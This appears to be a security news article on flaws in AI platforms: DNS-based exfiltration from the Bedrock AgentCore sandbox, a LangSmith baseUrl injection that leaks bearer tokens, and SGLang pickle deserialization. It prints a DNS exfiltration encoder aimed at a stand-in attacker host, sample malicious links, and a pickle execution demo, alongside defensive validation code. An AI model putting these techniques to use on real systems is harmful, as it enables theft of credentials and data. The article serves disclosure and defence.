Cybersecurity researchers have disclosed a new technique for exfiltrating private data from artificial intelligence (AI) code execution environments using Domain Name System (DNS) queries. In a report published Monday, BeyondTrust said the sandbox mode of the Amazon Bedrock AgentCore Code Interpreter permits outbound DNS queries, which an attacker can abuse to open interactive shells and bypass network isolation. The issue has not been assigned a CVE identifier, but it carries a CVSS score of 7.5 out of 10.0.
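DNS-based exfiltration works because arbitrary data can be smuggled into query names, which often resolve even when all other outbound traffic is blocked. The sketch below shows only the generic encoding step; the domain `attacker.example`, the function name, and the sample secret are illustrative assumptions, not details from BeyondTrust's report:

```python
import binascii

MAX_LABEL = 63  # DNS limits each label to 63 bytes (RFC 1035)

def encode_for_dns(secret: bytes, domain: str) -> list[str]:
    """Hex-encode a secret and split it into DNS-safe hostnames.

    Resolving each returned name would send one chunk of the secret
    to whoever operates the authoritative server for `domain`.
    """
    hex_data = binascii.hexlify(secret).decode()
    chunks = [hex_data[i:i + MAX_LABEL] for i in range(0, len(hex_data), MAX_LABEL)]
    # Prefix each chunk with a sequence number so the receiver can reassemble.
    return [f"{n}.{chunk}.{domain}" for n, chunk in enumerate(chunks)]

names = encode_for_dns(b"AKIA-example-key", "attacker.example")
# In a sandbox that allows DNS, resolving each name (e.g. via
# socket.getaddrinfo) would leak the chunks through the permitted DNS path.
```

Blocking outbound traffic while leaving DNS resolution open is exactly the gap the report describes: the resolver itself becomes the covert channel.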

Amazon Bedrock AgentCore Code Interpreter, launched by Amazon in August 2025, is a fully managed service that lets AI agents execute code securely in isolated sandbox environments, preventing agentic workloads from reaching other systems.

A separate flaw, affecting the LangSmith platform, has been described as a case of URL parameter injection stemming from a failure to validate the baseUrl parameter. It allows an attacker to steal a logged-in user's bearer token, user ID, and workspace ID by exfiltrating them to an attacker-controlled server via social engineering, such as tricking the victim into clicking a link like one of the following:

- Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
- Self-hosted: /studio/?baseUrl=https://attacker-server.com

An attacker who successfully exploits the vulnerability could gain unauthorized access to the AI's trace history.
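The usual mitigation for this class of bug is to validate a user-supplied base URL against an allowlist before using it. The snippet below is a generic sketch of such a check, not LangSmith's actual fix; the allowlist contents and function name are assumptions for illustration:

```python
from urllib.parse import urlparse

ALLOWED_BASE_HOSTS = {"smith.langchain.com"}  # illustrative allowlist

def is_safe_base_url(base_url: str) -> bool:
    """Reject baseUrl values that would point outside the allowlist.

    Catches absolute URLs to foreign hosts as well as scheme-relative
    tricks like //attacker-server.com.
    """
    parsed = urlparse(base_url)
    if parsed.scheme not in ("https", ""):
        return False
    if parsed.netloc:  # absolute or scheme-relative URL
        return parsed.netloc in ALLOWED_BASE_HOSTS
    # A bare relative path stays on the current origin.
    return base_url.startswith("/") and not base_url.startswith("//")
```

Note the explicit scheme-relative check: `//attacker-server.com` has no scheme but still redirects off-origin, a detail naive prefix checks miss.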

They could also expose internal SQL queries, CRM customer records, or proprietary source code by inspecting tool calls.

"A logged-in LangSmith user could be compromised simply by visiting an attacker-controlled site or clicking on a malicious link," said Liad Eliyahu and Eliana Vuijsje, researchers at Miggo. "This flaw shows that AI observability platforms are now a critical part of infrastructure. These tools often bypass security guardrails by accident because they prioritize developer flexibility."

This risk is amplified because AI agents, unlike "traditional" software, often hold privileged access to internal data sources and third-party services.

## Unsafe Pickle Deserialization Flaws in SGLang

Security vulnerabilities have also been discovered in SGLang, a popular open-source framework for serving large language and multimodal AI models. If successfully exploited, the flaws could lead to unsafe pickle deserialization and, in turn, remote code execution.
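Pickle deserialization is dangerous because the format can encode arbitrary callables that execute during loading. The self-contained demonstration below shows the general mechanism with a deliberately harmless payload; it is not SGLang's specific code path:

```python
import pickle

executed = []

def record(msg):
    """Stand-in for a malicious callable (e.g. os.system)."""
    executed.append(msg)

class Payload:
    # __reduce__ tells pickle how to reconstruct the object; a crafted
    # pickle can name ANY importable callable here with chosen arguments.
    def __reduce__(self):
        return (record, ("code ran during unpickling",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # merely deserializing the blob triggers the call
```

This is why frameworks that accept pickled payloads from untrusted clients, as the SGLang findings describe, are effectively exposing a remote code execution primitive unless the input is authenticated or a safe serialization format is used instead.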